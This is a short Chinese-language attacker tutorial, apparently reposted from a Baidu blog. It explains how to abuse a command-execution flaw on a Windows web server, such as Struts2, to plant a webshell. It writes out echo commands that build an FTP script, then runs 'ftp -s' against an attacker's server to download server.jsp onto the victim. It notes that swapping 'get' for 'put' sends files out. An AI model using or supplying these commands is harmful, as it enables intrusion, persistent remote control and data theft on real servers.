某 个web的命令执行,windows主机,不像linux下可以通过wget下个文件很方便,开始尝试echo个vbs下载,如果直接在cmd下是没问题 的,但是web端执行发现只要有逗号就连同后面的内容一起没了,后来又尝试一个转码脚本,反正试了半天最后还是没成功,网上找了找,发现了ftp这个方 法,记录一下,本地先搭建一个ftp,假设用户名密码为admin/adminpwd 然后在web上分别执行如下命令:
echo admin>ftp.txt 注意admin后面不要加空格(FTP用户名)
echo adminpwd>>ftp.txt 同上,adminpwd后面不要加空格(FTP口令)
echo get server.jsp>>ftp.txt 这里注意server.jsp为放到你本地ftp文件夹下的webshell文件(注意echo后面不要用’包裹)
echo bye>>ftp.txt
这时web上通过命令执行ftp -s:ftp.txt 8.8.8.8 (这里8.8.8.8自行替换你搭建的ftp服务器地址)
ps:如果是上传文件,则将get server.jsp替换为put server.jsp即可。
执 行echo的时候有一个小细节需要注意,好多人喜欢echo admin > ftp.txt这么写(admin后有空格),这样文件写出来 admin后面也会有空格,传到ftp端的时候,用户名和密码就变成了admin空格和adminpwd空格,会提示你密码不正确
执行完就会发现可爱的server.jsp已经躺在当前目录下了,剩下的怎么操作随你了
转自:http://hi.baidu.com/zh2089/item/8c2141a53ff93d15a9cfb7d7
ps:这种方法可以用于win主机存在命令执行漏洞(如structs2)时下载webshell(linux下可以通过wget下载文件拿webshell)